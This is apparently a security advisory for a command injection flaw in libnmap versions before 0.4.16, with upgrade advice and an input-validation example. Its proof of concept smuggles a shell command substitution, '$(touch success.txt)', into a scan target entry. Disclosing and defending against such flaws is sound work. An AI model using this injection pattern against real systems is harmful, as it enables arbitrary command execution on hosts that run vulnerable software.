Severity: moderate

Command Injection

libnmap

Overview

Versions of libnmap before 0.4.16 are vulnerable to command injection.

Proof of concept

const nmap = require('libnmap');
const opts = {
    range: [
        'scanme.nmap.org',
        "x.x.$(touch success.txt)"
    ]
};
nmap.scan(opts, function(err, report) {
    if (err) throw new Error(err);

    for (let item in report) {
        console.log(JSON.stringify(report[item]));
    }
});

Remediation

Update to version 0.4.16 or later.
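
Where range entries come from user input, an allowlist check before calling nmap.scan adds a second layer beside the upgrade. The following is an added example, not code from libnmap or from this advisory; the function names isSafeTarget and validateRange and the accepted grammar (IP literal, CIDR block, hostname) are assumptions.

```javascript
const net = require('net');

// Characters that can appear in a hostname, IPv4/IPv6 literal or CIDR block.
// Checked first so nothing the shell treats specially gets any further.
const SAFE_CHARS = /^[a-z0-9.:\/-]+$/i;

// RFC 1123 label: letters, digits and hyphens, not starting or ending with "-".
const LABEL = /^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$/i;

function isHostname(s) {
    if (s.length === 0 || s.length > 253) return false;
    return s.split('.').every((label) => LABEL.test(label));
}

function isCidr(s) {
    const parts = s.split('/');
    if (parts.length !== 2 || !/^\d{1,3}$/.test(parts[1])) return false;
    const family = net.isIP(parts[0]); // 4, 6, or 0 when not an IP literal
    const bits = Number(parts[1]);
    return (family === 4 && bits <= 32) || (family === 6 && bits <= 128);
}

// A target passes only if it is an IP literal, a CIDR block or a hostname.
// Entries such as "x.x.$(touch success.txt)" fail the character check, and
// entries starting with "-" (which nmap would read as options) fail the rest.
function isSafeTarget(target) {
    if (typeof target !== 'string' || !SAFE_CHARS.test(target)) return false;
    return net.isIP(target) !== 0 || isCidr(target) || isHostname(target);
}

// Returns the range unchanged, or throws naming the rejected entries.
function validateRange(range) {
    if (!Array.isArray(range) || range.length === 0) {
        throw new TypeError('range must be a non-empty array');
    }
    const rejected = range.filter((t) => !isSafeTarget(t));
    if (rejected.length > 0) {
        throw new Error('rejected scan targets: ' + JSON.stringify(rejected));
    }
    return range;
}
```

Call validateRange(opts.range) before nmap.scan(opts, ...). nmap target forms outside this grammar, such as octet ranges, are rejected and would need their own pattern.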

Advisory timeline

  1. Created: 2018-11-01T14:13:29.913Z
  2. Updated: 2018-11-01T14:13:29.913Z